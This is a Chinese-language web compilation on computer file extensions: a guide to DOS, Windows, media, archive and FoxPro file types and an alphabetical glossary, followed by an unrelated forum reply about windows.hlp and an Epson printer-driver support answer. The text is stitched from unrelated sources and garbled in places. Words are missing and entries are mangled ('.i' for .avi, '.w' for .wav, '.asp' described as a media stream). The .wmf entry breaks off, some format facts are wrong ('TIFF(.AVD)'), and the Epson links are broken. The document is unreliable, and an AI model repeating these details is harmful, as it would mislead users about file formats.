伴随着可执行文件常附有以下几类文件:*.HLP即帮助文件(help)、*.CFG即配置文件(config)、*.DAT即数据文件(data)、*.LOG即日志文件(log)、*.TMP为临时文件(temporal)。

Windows环境下的文件名

绝大多数DOS文件名后缀在Windows下继续有效,但Windows本身也引出了许多种崭新的后缀名,如:*.drv为设备驱动程序(Driver)、*.fon和*.fot都是字库文件、*.grp为分组文件(Group)、*.ini为初始化信息文件 (Initiation)、*.pif为DOS环境下的可执行文件在Windows下执行时所需要的文件格式、*.crd即卡片文件(Card)、*.rec即记录器宏文件(Record)、*.wri即文本文件(Write),它是字处理write.exe生成的文件、*.doc和*.rtf也是文本文件(Document),它们是Word产生的文件、*.cal为日历文件、*.clp是剪贴板中的文件格式、*.htm和 *.html即主页文件、*.par为交换文件、*.pwl为口令文件(Password)等等。

图像文件名后缀

进入多媒体世界后,大家会看到各种各样精彩的,会发现许多种后缀名。的确,由于各个公司在开发图形有关的软件时都自制标准,导致今日在图形方面有太多的格式,以下就是常见的几种格式:

首先是一种位图文件格式,它是一组点(像素)组成的图像,它们由图像程序生成或在扫描图像时创建。主要有Windows位图(.BMP):由Microsoft公司开发,它被Windows和Windows NT平台及许多应用程序支持。支持32位颜色,用于为Windows界面创建图标的文件格式,光标(.CUR、.DLL、.EXE):文件格式,用于创建Windows界面的光标。OS/2位图(.BMP):Microsoft公司和IBM开发的位图文件格式。它为各种操作系统和应用程序所支持。支持压缩,最大的图像像素为64000×64000。画笔(.PCX):由Zsoft公司推出,它对图像数据也进行了压缩,可由PCX生成。用于Windows的画笔。支持24位颜色,最大图像像素是64000×64000。支持压缩。图形交换格式:

Graphics Interchage format(.GIF):由Compu Serve创建,它能以任意大小支持图画,通过压缩可节省存储空间,还能将多幅图画存在一个文件中。支持256色,最大图像像素是64000×64000。

Kodak Photo CD(.PCD):Eastman Kodak所开发的位图文件格式,被所有的平台所支持,PCD支持24位颜色,最大的图像像素是2048×3072,用于在CD-ROM上保存照片。

Adobe Photoshop(.PSD):Adobe Photoshop的位图文件格式,被Macintosh和MS Windows平台所支持,最大的图像像素是30000×30000,支持压缩,广泛用于商业艺术。

Macintosh绘画(.MAC):Apple公司所开发的位图文件格式。被Macintosh平台所支持,仅支持单色原图,最大图像像素是576×720。支持压缩,主要用于在Macintosh图形应用程序中保存黑白图形和剪贴画片。

动画文件的后缀名

动画文件格式用于保存包含动画框架中的图形信息。主要有:Autodesk FLIC(.FLC):即.FLI,Autodesk Animator和AnimatorPro的动画文件格式。支持256色,最大的图像像素是64000×64000,支持压缩。广泛用于动画图形中的动画序列、计算机设计和计算机游戏应用程序。不大适合制作真实世界图像动画。

MacPICTS(.PCS,.PIC):Macromedia开发的动画文件格式,为Macintosh应用程序使用。支持256色,支持压缩,用于保存动画数据,是Quick Time的前身。

Microsoft互换文件格式,TIFF(.AVD):Microsoft公司开发的动画文件格式,被Windows、Windows

NT平台和OS/2多媒体应用程序所支持,支持256色和压缩,用于在多媒体应用程序中保存音频、和图形信息。

MPEG(.MPEG):国际标准化组织的运动图像专家小组开发的动画文件格式。被所有平台和Xing Technologies

MPEG播放器及其它应用程序所支持,支持压缩,最大图像像素是4095×4094×30帧/每秒。用于编码音频、、文本和图形数据。

Quick Time(.QTM):Apple计算机公司开发的动画文件格式。被Apple Macintosh和Microsoft

Windows平台所支持,支持25位颜色,最大图像像素是64000×64000,支持压缩,用于保存音频和运动信息。

声音文件的后缀名

声音文件格式是用于保存数字音频信息的。它们主要有:

AIFF(.AIF):这是Apple计算机公司开发的声音文件格式,被Macintosh平台和应用程序所支持。支持压缩。

Amiga声音(.SVX):Commodore所开发的声音文件格式,被Amiga平台和应用程序所支持,不支持压缩。

MAC声音(.SND):Apple计算机公司开发的声音文件格式,被Macintosh平台和多种Macintosh应用程序所支持,支持某些压缩。

MIDI(.MID):国际MIDI协会开发的声音文件格式,被Windows平台和许多应用程序所支持,用于为乐器创建数字声音。

声霸(.VOC):Creative Labs公司开发的声音文件格式,被Windows和DOS平台所支持,支持压缩。

WAVE(.WAV):微软公司用作Windows平台上保存音频信息的格式。

压缩文件的后缀名

为了提高存储效率,许多公司都推出了压缩数据的方法和相应的软件,这类文件的使用主要通过压包和解包软件来进行,主要的后缀有:*.zip、*.arj、*.rar、*.lzh、*.jar。还有一些专用的压缩文件,如:*.ex_、*.dl_、*.d3_、*.cab等。

数据库类文件的后缀名

在Dbase、FoxBase、Foxpro系列软件的环境下有以下几类后缀:

.dbf 数据库文件(databasefile) .prg 命令文件(即程序Program)

.fxp 编译后的程序 .scx和.sct 屏幕文件

.fpt 备注字段文件 .frx和.frt 报表文件

.cbx和.pjt 标签文件 .mnx 和.mnt 菜单文件

.pjx和.pjt 工程文件 . 应用文件

.cdx和.idx 索引文件 .qpr和.qpx SQL查询文件

.fp 配置文件 .ap 生成应用

.err 编译错误文件 .men 内存应用

.fky 键宏文件 .win 窗口文件

.pcb 库文件 .tmp 临时文件

.tbk 临时数据库文件

可安全删除的文件类型

临时文件:*.tmp,*.syd,*.$$$,*.@@@,*._mp,*.gid,*.~*,*.gts

备份文件:*.bak,*.old,*.wbk,*.xlk,*.ckr_

帮助文件:*.hlp、*.chm、*.cnt

后记

用户要注意在不同的操作系统下,后缀名的约定会有所不同,如在Unix下,*.p代表Pascal语言程序,*.z代表压缩文件,*.tar代表归档文件。另外,针对极特殊的设备,其驱动程序也会有特殊的后缀,如3DS显示卡的驱动程序是*.exp。还有某些公司针对自己的产品也规定了文件名后缀,如方正公司的图像排版文件规定用*.grh(即Graph)。

文件名的后缀代表着某一种类型的文件,一般会由某一种特定的软件产生和处理。只有对这些后缀名的知识有一定的了解,才能在上机的过程中知道其所以然。这儿带着大家看到了常见的一些后缀类型,实际上还有很多类型,不可能全部讲完。常言说,师傅领进门,修行在个人,以后大家在计算机世界中自己转着看吧。

常见的文件后缀名

.ACA

Microsoft的代理使用的角色文档

.acf

系统管理配置

.acm

音频压缩管理驱动程序,为Windows系统提供各种声音格式的编码和解码功能

.aif

声音文件,支持压缩,可以使用Windows Media Player和QuickTime Player播放

.AIF

音频文件,使用Windows Media Player播放

.AIFC

音频文件,使用Windows Media Player播放

.AIFF

音频文件,使用Windows Media Player播放

.ani

动画光标文件扩展名,例如动画沙漏。

.ans

ASCII字符图形动画文件

.arc

一种较早的压缩文件,可以使用WinZip,WinRAR,PKARC等软件打开

.arj

压缩文件。可以使用WinZip,WinRAR,PKARC等软件打开

.asf

微软的媒体播放器支持的流,可以使用Windows Media Player播放

.asp

微软的流文件,可以使用Windows Media Player打开

.asp

微软提出的Active Server Page,是服务器端脚本,常用于大型网站开发,支持数据库连接,类似PHP。可以使用Visual InterDev编写,是目前的大热门

.asx

Windows Media 媒体文件的快捷方式

.au

是Internet中常用的声音文件格式,多由Sun工作站创建,可使用软件Weform Hold and Modify 播放。Netscape Nigator中的LiveAudio也可以播放.au文件

.i

一种使用Microsoft RIFF规范的Windows多媒体文件格式,用于存储声音和移动的

.bak

备份文件,一般是被自动或是通过命令创建的文件,它包含某个文件的最近一个版本,并且具有于该文件相同的文件名

.bas

Basic 语言源程序文件,可编译成可执行文件,目前使用Basic开发系统的是Visual Basic

.bat

批处理文件,在MS-DOS中,.bat文件是可执行文件,有一系列命令构成,其中可以包含对其他程序的调用

.bbs

电子告示板系统文章信息文件

.bfc

Windows的公文包文件

.bin

二进制文件,其用途依系统或应用而定

.bmp

Bitmap位图文件,这是微软公司开发Paint的自身格式,可以被多种Windows和Windows NT平台及许多应用程序支持,支持32位颜色,用于为Windows界面创建图标的文件格式。

.c

C 语言源程序文件,在C语言编译程序下编译使用

.cab

Microsoft制订的压缩包格式,常用于软件的安装程序,使用Windows自带的实用程序,Extract.exe可以对其解压缩,WinZip,WinRAR等都支持这种格式

.cal

Windows 中的日历文件

.cdf

Internet Explorer的频道文件

.cdr

CorelDraw中的一种图形文件格式,它是所有CorelDraw应用程序中均能够使用的一种图形图像文件格式

.cdx

索引文件,存在于Dbase,Foxbase,Foxpro系统软件环境下

.cfg

配置文件,系统或应用软件用于进行配置自己功能,特性的文件

.chm

编译过后的HTML文件,常用于制作帮助文件和电子文档

.clp

在Windows下剪贴板中的文件格式

.cmd

用于Windows NT/2000的批处理文件,其实与BAT文件功能相同,只是为了与DOS/Windows 9x下的BAT有所区别

.cmf

声卡标准的音乐文件,FM合成器等可以回放

.cnf

NetMeetting会议连接文件

.cnt

联机帮助文件目录索引文件,通常和同名的.hlp文件一起保存

.col

由Autodesk Animator,Autodesk Animator Por等程序创建的一种调色板文件格式,其中存储的是调色板中各种项目的RGB值

DOS可执行命令文件,一般小于64KB

.cpl

控制面板扩展文件,Windows操作系统使用

.cpp

C++语言源程序,非常强大的语言,在各种平台中都有相应的开发系统

.crd

Windows中的卡片文件

.crt

用于安全方面的证书认证文件

.cur

Windows下的光标文件格式,可用光标编辑软件编辑

.css

Text/css文件

.dat

数据文件,在应用程序中使用

.dat

VCD中的图象声音文件,VCD播放软件可调用,或是通过VCD机播放

.dbf

数据库文件,Foxbase,Dbase,Visual FoxPro,等数据库处理系统所产生的数据库文件

.dcx

传真浏览文档文件

.ddi

映象文件,DUP,HD,IMG等工具可展开

.dev

设备驱动程序

.dib

设备无关位图文件,这是一种文件格式,其目的是为了保证用某个应用程序创建的位图图形可以被其它应用程序装载或显示一样

.dir

目录文件

.dll

Windows动态连接库,几乎无处不在,但有时由于不同版本DLL冲突会造成败各种各样的问踢

.doc

是目前市场占有率最高的办公室软件Microsoft Office中的字处理软件Word创建的文档

.dos

Windows保留的MS-DOS的某些系统文件

.dot

Microsoft Word的文档模板文件,通过模板可以简化一些常用格式文档的创建工作,而且可以内嵌VBA程序来实现某些自动化功能

.drv

设备驱动程序文件,用在各种系统中

.dwg

AutoCAD的图纸文件,也是许多绘图软件都支持的格式,常用于共享数据

.dxb

AutoCAD创建的一中图形文件格式

.dxf

图形交换格式,一种计算机设计的文件格式,最初开发用来与AutoCAD一起使用,以便于图形文件在应用程序之间的传递,它以ASCII方式储存图形,在表现图形的大小方面十分精确

.der

Certiticate文件

.dic

Txt文件

.emf

由Microsoft公司开发的Windows 32位扩展图元文件格式,其总体设计目标是要弥补在Microsoft Windows 3.1(Win16)中用的*.wmf文件格式的不足,使得图元文件更加易于使用

.eps

用PostScript语言描述的一种图形文件格式,以文本文件保存,在PostScript图形打印机上能打印出高品质的图形图象,最高能表示32位图形图象

.err

编译错误文件,存在于Dbase,Foxbase,Foxpro系列软件环境下

.exe

可执行文件,虽然后缀名相同,但具有不同的格式和版本

exp

3DS使用的显示卡驱动程序

.exc

Txt文件

.flc

Autodesk Animator和Animatorpro的动画文件,支持256色,最大的图象象索是64000*64000,支持压缩,广泛用于动画图形中的动画序列,计算机设计和计算机游戏应用程序

.fnd

保存的搜索结果

.fon

点阵字库文件

.for

Fortran语言程序

.fot

指向字体的快捷键

.fp

配置文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下

.fpt

备注字段文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下

.frt

报表文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下

.frx

报表文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下

.fxp

编译后的程序,存在于Dbase,Foxbase,Foxpro系列软件的环境下

.gif

在各种平台的各种图形处理软件上均能够处理的,经过压缩的一种图形文件格式

.grh

方正公司的图象排版文件

.grp

Windows下的程序管理器产生的组窗口文件

.goc

Gocserve

.gra

MSGraph.Chart.5

.h

C语言源程序头文件

.hlp

Windows应用程序帮助文件

.hqx

Macintosh中使用BinHex将二进制文件编码为7位的文本文件,大多数Macintos件皆以.hqx出现(.bin极少使用),在Macintosh中,可使用StuffIt Expander对.hqx解码,在Windows中可使用BinHex 13解码

.ht

超级终端

.htm

保存超文本描述语言的文本文件,用于描述各种各样的网页,使用各种浏览器打开

.html

同.htm文件

.icm

图象配色描述文件

.ico

Windows中的图标文件,可以包含同一个图标的多种格式,使用图标编辑软件创建

.idf

MIDI乐器定义

.idx

索引文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下

.iff

文件交换格式文件,这种文件格式多用于Amiga平台,在这种平台上它几乎可以存储各种类型的数据,在其它平台上,IFF文件格式多用于存储图象和声音文件

.image

MAcintosh磁盘映象文件,常见于萍果机的FTP网点,在Macintosh中由Shrink Wrap处理

.ime

Windows下的输入法文件

.img

磁盘映象文件,用HD-COPY,WinImage等工具打开后可以恢复到一张磁盘上

.inc

汇编语言包含文件,类似C/C++中的.H文件

.inf

Windows下的软件安装信息,Windows的标准安装程序根据此文件内的安装信息对软件,驱动程序等进行安装

.ini

Windows中的初始化信息文件,已经用的不多了,新的应用程序将设置保存在系统的注册表中

.jar

一种压缩文件,ARJ的新版本,不过不太流行,可以使用WinJar,Winrar等打开

.jpeg

一种压缩文件,同.jpg

.jpg

静态图象专家组制订的静态图象压缩标准,具有很高的压缩比,使用非常广泛,可使用PhotoShop等图象处理软件创建

.lnk

快捷方式,这个文件指向另一个文件,开始菜单的程序文件夹下每条项目都是一个LNK文件

.log

日志文件,通常用来记录一些之类

.lzh

一种古老的压缩文件,可以使用WinRAR打开

.mac

Macintosh中使用的一中灰度图形文件格式,在Macintosh Paintbrush中使用,其分辨率只能是720*567

.mag

图形文件格式

.mdb

Microsoft Access使用的数据库格式,是非常流行的桌面数据库

.men

内存应用文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下

.mid

音频压缩文件,曾经非常流行,不过在现在的软件中用的很少了

.mif

MIDI乐器

.mov

使用Apple's QuickTime格式的**文件,在Macintosh中由Sparkle,FastPlayer,MoviePlayer等软件播放,在Windows中可由Quicktime播放

.movie

QuickTime或苹果机的格式,在Macintosh中由Sparkle,FastPlayer,MoviePlayer等软件播放,在Windows中可由QuickTime播放

.mp3

用MPEG-1 Layout 3标准压缩的音频文件,是网上主要的压缩音频文件,这种文件由于具有极高的压缩率和失真低的特点,是目前音乐盗版的主要文件格式,但目前受到VQF,WMA等新标准的挑战

.mpg

用MPEG-1标准压缩的文件,与VCD使用的格式非常相近,提供CD质量的音频信号和320*240的分辩率,目前的媒体播放软件大都能播放,Microsoft的WMV8和MPEG-4压缩的AVI文件是其强大的竞争对手

.mpt

Macintosh中使用的一种图形文件格式

.msg

Microsoft邮件文档

.obj

对象代码

.ovl

由于软件功能多,内存偏小,不能一次性全部调入内存的可执行文件可能有同文件名的ovl文件

.pcd

位图文件,由Eastman Kodak开发,被所有的平台所支持,PCD支持24位颜色,最大的图象像索是2048*3072,用于在CD-ROM上保存

.pcs

动画文件,是Macromedia开发的动画文件格式,为Macintosh应用程序使用,支持压缩,支持256色,用于保存动画数据,是Quick Time的前身

.pcx

图像文件,PCX格式是ZSOFT公司在开发图像处理软件Paintbrush是开发的一种格式,这是一种经过压缩的格式,占用磁盘空间较少

.pdf

图文多媒体文件,Adobe公司定义的电子印刷品文件格式,它是一种事实上的标准,在Internet网上的很多电子印刷品,都是.pdf格式的

.psd

是PhotoShop中使用的一种标准图形文件格式,能够保存图像数据的每一个细小部分,包括层,附加的蒙版通道以及其他内容

.pwl

Windows下的口令文件

.qt

Machintosh 的QuickTime格式,在Macintosh中由Sparkle,FastPlayer,MoviePlayer等软件播放,在Windows中可由Quicktime播放

.qtm

动画文件,这种文件格式是由Apple计算机公司开发,被Apple Macintosh和Microsoft Windows平台所支持,支持25位颜色,最大图像分辩率是64000*64000,支持压缩,用于保存音频和运动信息

.rec

Windows下的记录器宏文件

.reg

Windows 95/98的系统及应用程序注册文件,这种文件虽然以纯文本文件保存,但一样存在版本问题,不同的操作系统使用的REG文件版本是不同的

.rle

一种压缩过的位图文件格式,RLE压缩方案是一种极其成熟的压缩方案,特点是无损失压缩,既节省了磁盘空间又不损失任何图像数据,但在打开这种压缩文件时,要花费更多时间,此外,一些兼容性不太好的应用程序可能会搭不开

.rm

Windows下的RealPlayer所支持的压缩文件,网上非常流行的流式文件,很多实时新闻等都是用这种格式的,不过,最新的Windows Media Video V8已经对其发起了强大的攻势

.rmi

MIDI音序文件

.rtf

丰富文本格式文件,以纯文本描述内容,能够保存各种格式信息,可以用写字版,Word等创建

.s

存档文件

.scp

用于Windows系统中Internet拨号用户,自动拨号登录用的脚本文件,可避免手动登录时繁琐的键盘输入

.scr

屏障保护文件

.sct

屏幕文件

.scx

屏幕文件

.set

Microsoft备份集文件,用于保存要备份的内容,设置等信息

.shb

指向一个文档的快捷方式

.snd

Mac声音文件,Apple计算机公司开发的声音文件格式,被Macintosh平台和多种Macintosh应用程序所支持,支持某些压缩

.sql

查询文件,在Dbase,Foxbase,Foxpro系列软件的环境下使用

.svg

SVG可以算是目前最火热的图像文件格式了,它是基于XML由WorldWideWebConsortium联盟开发的,SVG是可缩放的矢量图形

.svx

Amiga声音文件,Commodore所开发的声音文件格式,被Amiga平台和应用程序所支持,不支持压缩

.swf

flash是Micromedia公司的产品,严格说它是一种动画编辑软件,实际上它是制作出一种后缀名为.swf的动画,这种格式的动画能用比较小的体积来表现丰富的多媒体形式,并且还可以与HTML文件达到一种"水融"的境界

.swg

虚拟内存交换文件,由操作系统使用

.sys

系统文件,驱动程序等,在不同的操作系统中有不同的定义

.tbk

临时数据库文件,在Dbase,Foxbase,Foxpro系列软件的环境下使用

.tga

图像文件,此文件格式的结构比较简单,属于一种图形,图像数据的通用格式,在多媒体领域有着很大影响,是计算机生成图像向电视转换的一种首选格式

.tiff

图像文件,此图像格式复杂,存储内容多,占用存储空间大,其大小是GIF图像的3倍,是相应的JPEG图像的10倍,最早流行于Macintosh,现在Windows主流的图像应用程序都支持此格式

.tmp

临时文件,一般是系统和应用程序产生的临时使用的文件,当系统和应用程序退出时,会自动地删除其建立的临时文件,如果是非正常退出,临时文件可能保留在磁盘上,在单任务系统下,可立即删除它们,在多任务系统下,应删除那些不是正在使用的临时文件

.txt

文本文件

.url

InternetShortcut(internet 上URL地址的快捷方式)

.vcd

虚拟光驱工具制作的光盘镜像文件

.ver

版本描述,用于描述某个软件的版本信息的文件,内容因软件而异

.voc

声音文件,此文件格式由Creative Labs公司开发,被Windows和DOS平台所支持,支持压缩

.vxd

虚拟设备驱动程序,在Windows操作系统中非常常见,是重要的系统文件

.wab

通信簿文件,由系统中的通信簿程序使用

.w

音频文件,此文件格式是在Windows上用于保存音频信息的格式,Windows中由Weform Hold and Modify或Nigator,或"媒体播放机"播放,存在许多编码方式,需要相应的解码程序才能播放

.win

窗口文件,在Dbase,Foxbase,Foxpro系列软件的环境下使用

.wmf

Microsoft Windows中常见的一种图元文件格式,它具有文件短小,图案造型化的特点,整个图形常由各个独立的

系统文件的扩展名有那些!

windows.hlp是帮助文件,一般精简的系统都没有。。。实际也没什么用~~想要的话网上很多直接下一个就行~~

在电脑的开始菜单不是有注销么?在那里注销用户,只留下超级管理员administer,如果没有设密码一般是直接登录(不过有时这样被默认是有漏洞的登录方式),要是还是不行,在开始-控制面板-用户账户-更改用户登录或注销的方式-把 使用欢迎屏幕 选项勾选,在应用选项就ok了~~

万一还是不行的时候可以用360系统急救箱~~云端同步下系统文件就好了~~

我在装爱普生LQ-630K打印机时出现找不到UNRDIV.HLP文件

1.可执行文件

COM:系统命令文件,主要用汇编语言编辑而成,二进制代码格式。其特点是非

常短小,长度一般不超过64KB。在DOS时代,*.COM文件比较常见,在Windows 98

中,COM格式的可执行文件已经不多见了(主要是WIN.COM、COMMMAND.COM等文件)。

EXE:系统可执行文件,多半用编程语言(如常见的C、VC、VB、VF等)编译而

成,其长度没有什么限制。在Windows系统中的应用范围非常广泛,我们目前所

使用的应用程序基本上都是EXE文件。

BAT:批处理文件,主要由用户编辑而成,可包含多个不同的应用程序或命令。执

行后,系统会依次启动该批处理文件包含的所有命令,从而免去了用户逐条输入

命令之苦,简化了用户的操作。

SCR:屏幕保护文件。只需双击相应的屏幕保护程序(*.SCR)即可启动,但它一

般不受用户控制而由系统调用。

2.系统支持文件

由于内存、文件大小的限制、功能的调用等方面原因,有的应用程序不能将运行

所需的一切内容全部内置到EXE可执行文件中,大多数仅将系统的核心模块保存

到EXE文件中,将运行所需的其他内容分别保存到相应的系统支持文件。

DLL:动态链接库文件,主要负担着向其他应用程序提供运行所需的函数、参数、

对话框等信息(任何应用程序,包括用户自己编辑的程序都可以直接调用*.DLL

动态链接库),从而各应用程序设计者就不必再为诸如对话框设置、函数调用等

问题而操心,既方便了软件的设计,又减小了可执行文件的大小。

DRV:Windows 98的设备驱动程序,它为系统的绝大多数常规硬件设备(如鼠标、

显卡等)提供所需的软件支持。

SYS:系统扩展管理文件,主要为某些非标准设备(如USB)提供必要的硬件驱动

程序等。其中一些特例文件,我们将在《扩展名应用技巧》一文中进行介绍。

VXD:虚拟设备文件,主要为虚拟硬件设备提供支持。

LIB:相关应用程序所使用的库文件。

3.系统配置文件

INI:最常见的系统配置文件,在Windows 3.X时代,系统的一切软硬件配置信息

都保存在*.INI配置文件中。在Windows 95/98中,尽管注册表数据库已逐渐取

代了INI文件的作用,但部分应用程序依旧使用INI文件作为系统配置文件。需要

提醒大家的是,INI文件的容量有一定限制,它一般不能超过64KB,否则可能导

致一些不可预料的错误。

INF:主要用于保存Windows 98有关软硬件的安装信息。光驱、Modem等硬件设备

和部分软件的安装都必须在*.INF文件的指导下进行。许多光盘的根目录下经常

可以看到AUTORUN.INF文件,该文件是一个光盘配置文件,专门用于设置光盘的

自动运行程序、图标等信息。

PIF:系统配置文件中的一种,可根据实际情况对每个DOS应用程序在Windows下

的运行状况(如运行方式、屏幕大小、内存大小、显示字体等)加以调节,保

证DOS程序在Windows中的正常运行。

LOG:日志文件。我们可使用包括记事本在内的任何文字处理软件对*.LOG文件

进行编辑处理,它是有关应用程序对自己的运行状况所作的记录,以便于用户查

询相应程序的运行状况(如我们在使用磁盘扫描程序SCANDISK时,系统即会自

动在相应磁盘根目录下生成一个磁盘扫描日志文件SCANDISK.LOG,我们可利用

该文件对磁盘的运行状况进行了解)。

REG:一种特殊格式的系统配置文件,可通过注册表编辑器将Windows 98注册表

数据库中不可见的信息用文本格式导出来,用户可直接通过记事本对其进行

编辑、修改,从而解决了对注册表数据库阅读管理比较困难的问题。双击编辑

好的*.REG文件,可将文件中的内容重新导入到注册表数据库中,从而达到间接

修改注册表数据库的目的。

CFG:部分应用软件自己配置的文件,保存着软件运行的有关状况。一般由软件

直接控制,用户无法手工对其进行配置。

CNF:用于保存系统设备信息的配置文件。

其中有两个特殊扩展名的配置文件,CONFIG.DB和CONFIG.FX,它们分别是

Dbase(DB)和FoxBASE(FX)的系统配置文件。

CPL:Windows 98的控制面板文件。控制面板中的显示器、系统、输入法等设置

项目全部都是由硬盘上相应的CPL文件构成。

4.其他系统文件

PWL:部分应用程序用于保存用户输入口令的文件(文件本身已经加密)。

Windows 98就是其中的典型,它的启动密码就保存在安装文件夹中

的“用户名.PWL”文件中。

ICO:图标文件。

SWP:系统交换文件(WIN386.SWP),用于Windows 98取的虚拟交换文件技术。

在Windows 3.X中,系统交换文件用的是*.PAR扩展名。明白了这一道理之后,

我想再也不会有人问“为什么自己的Windows目录下有一个占用了上百兆并且无

法删除的SWP文件?”之类的问题了。

CUR:鼠标文件。为了帮助用户正确区分目前的系统状态,Windows为不同的运行

状态提供了多种不同的鼠标指针,如常见的箭头、漏斗等。另外,系统还提供了

一种动画鼠标文件,如奔跑中的骏马、得意洋洋的恐龙等, *.ANI就是这些动

画鼠标文件的“缔造者”。不过要注意的是,该功能会占用大量的系统,

计算机速度较慢的用户最好不要使用。

LNK:快捷方式文件,由应用程序的实际路径、启动目录、运行参数等内容所构成,

我们只需右击相应的快捷方式(凡是在图标中显示了一个小箭头的就是快捷方式),

然后从弹出的快捷菜单中执行“属性”命令就能对快捷方式指定的内容进行修改。

HLP:帮助文件。无论是DOS应用程序,还是Windows应用程序,其帮助系统一般都

用HLP格式。Windows 98又新增了一种用HTML格式的*.CHM帮助文件,它较之

老式的*.HLP帮助文件更直观、更具说服力。Windows 95不支持CHM格式。

IME:中文Windows 98的输入法文件。

MB:中文Windows 98的输入法码表源文件,可生成直接使用的IME输入法文件,也

可还原原始的TXT编码文件(这一切都是通过Windows 98自带的输入法生成器来实

现的)。

REM:Windows 98智能ABC输入法的自定义词组文件,经常使用该输入法的用户不妨

将tmmr.rem和user.rem文件备份下来,达到备份自定义词组的目的。

DIC:字典文件。它们一般由软件商提供,用户只需将其拷贝到相应文件夹中即可直

接使用(我们最常见的字典文件是Word的拼写检查字典文件:CUSTOM.DIC)。

GRP:在Windows 3.X中,系统是用分组的方式对有关应用程序进行管理的(如主

群组、游戏组等),这些分组信息就保存在此文件中。不过Windows 95/98已不再

用分组方式管理文件,因此GRP文件也越来越少见了。

CLP:使用剪贴板查看程序将剪贴板中的内容保存下来之后生成的文件。

FND:Windows 98的查找功能所保存的查找记录文件,我们只需双击该文件即可快

速按照上次的保存条件进行查找,使用非常方便。

CHK:当我们使用CHKDSK或SCANDISK对磁盘进行扫描时,若发现丢失的簇,系统就

会将它们转换为*.CHK临时文件保存到相应硬盘分区的根目录中,这些文件一般没

有多大使用价值,用户可在确认无用的基础上将它们删除。

NO:Serial.no序列号文件,使用Windows的记事本可以查看。

ACL:Windows系统的用户登录口令文件。

Windows提供了一项非常实用的打印到文件功能,即用户在执行打印操作时不直接

将数据发送到打印机中进行打印,而是用专用的*.PRN文件形式保存到硬盘上,

然后我们只需将该文件拷贝到安装有打印机的计算机上,并执行DOS的“COPY

(PRN文件) PRN/B”命令即可进行打印

您好:

如果提示此问题,说明是您的电脑操作系统的问题。是系统缺失文件造成的,安装驱动程序时驱动程序需要调用系统上的文件,若系统缺失文件或系统为简化版系统,就会提示插入XP光盘或者提示缺文件的提示。

对于这个问题有两个解决方案。一:建议您安装完整版操作系统(推荐)。二:如果提示缺失的文件,可以下载对应文件移动到提示的路径中再安装试下,不能保证一定能行。不同的电脑操作系统缺失的文件是不一样的,所以缺失的文件,需要您自己去找的。或者联系电脑方面的工程师。

建议您通过以下爱普生网站下载该机型的驱动程序:

Epson LQ-630K Windows 2000/XP 驱动程序

://.epson.cn/s/tech_support/GuideDriveContent.aspx?ColumnId=1347&ArticleId=1903

EPSON LQ-630K WindowsVista/7 驱动程序

://.epson.cn/s/tech_support/GuideDriveContent.aspx?ColumnId=1347&ArticleId=7757

EPSON LQ-630K WindowsXP /7 64位/Vista 64位驱动程序

://.epson.cn/s/tech_support/GuideDriveContent.aspx?ColumnId=1347&ArticleId=7759

如果您使用的电脑是WindowsXP系统:

您可以按照以下方法安装Windows系统内置的LQ-1600K通用驱动:

打开“控制面板”--“打印机和传真”--“添加打印机”--“下一步”--“连接到这台计算机的本地打印机”(注:不要选择“自动检测并安装我的即插即用打印机”)--端口选择USB00X(X表示数字,通常选数字最大的端口,若不能打印再依次尝试其它的USB端口)或者LPT1 “--下一步”--厂商选择“EPSON”--型号选择“LQ-1600K”--“下一步”,然后按照屏幕提示操作完成。

提示:如果安装过程中提示缺少某个文件,而导致驱动无法正常安装,则说明您使用的Windows操作系统不完整,建议您更换其它电脑测试或重新安装操作系统。

如果您使用的电脑是Windows7系统:

或则您可以安装Windows7系统内置的LQ Series1(80) 通用驱动,详细解决方案请参照以下链接文档:

://.epson.cn/s/tech_support/faq/QA-content.aspx?ColumnId=130&ArticleId=9857&pg=&view=&columnid2=130

提示:如果安装过程中提示缺少某个文件,而导致驱动无法正常安装,则说明您使用的Windows操作系统不完整,建议您更换其它电脑测试或重新安装操作系统。

若以上方案仍无法解决您的问题,

请您登陆爱普生的“在线工程师”:://219.232.55.146/portal/epson,

实时与爱普生工程师在线交流,

以便问题得到及时解决。(爱普生“在线工程师”服务时间:周一至周五9:00-18:00)